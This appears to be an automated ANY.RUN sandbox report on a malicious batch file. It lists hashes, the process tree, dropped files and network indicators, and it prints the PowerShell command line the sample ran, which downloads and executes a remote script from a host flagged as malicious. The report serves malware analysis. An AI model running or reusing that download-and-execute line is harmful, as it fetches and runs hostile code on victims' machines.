analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

bat.bat

Full analysis: https://app.any.run/tasks/11ef5ec3-332b-4f43-9d73-5a9a32be643e
Verdict: Malicious activity
Analysis date: July 12, 2020, 20:49:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

A6722F70CD0F2BA8C274593F79C16B4E

SHA1:

A87DA6C5CD38816D60A2654F7A31FD4191F2EC7F

SHA256:

A621B4C71408867F2DE749A7D7306EA168C74AEE7979A0A94D9E05A61C8A5C4D

SSDEEP:

3:VSJJLN9f4etmAcLhzAK5DikANQMRdA:snR8zD5qpdA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 1148)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2788)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1148cmd /c ""C:\Users\admin\AppData\Local\Temp\bat.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2788powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://pd1zb.nl/files/svchost.txt');"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
282
Read events
215
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TAAZ5EDIZSLG5NQWJ67B.temp
MD5:
SHA256:
2788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf5d3a.TMPbinary
MD5:9513FB270E7972038EE17F3493D0A5D7
SHA256:D50920EB996BF5E30355DCAAAF151A1FB0B5C85E7CF41C1EF67149FE6A7FD9B7
2788powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:9513FB270E7972038EE17F3493D0A5D7
SHA256:D50920EB996BF5E30355DCAAAF151A1FB0B5C85E7CF41C1EF67149FE6A7FD9B7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2788
powershell.exe
109.237.221.83:443
pd1zb.nl
Mihos
NL
malicious

DNS requests

Domain
IP
Reputation
pd1zb.nl
  • 109.237.221.83
malicious

Threats

No threats detected
No debug info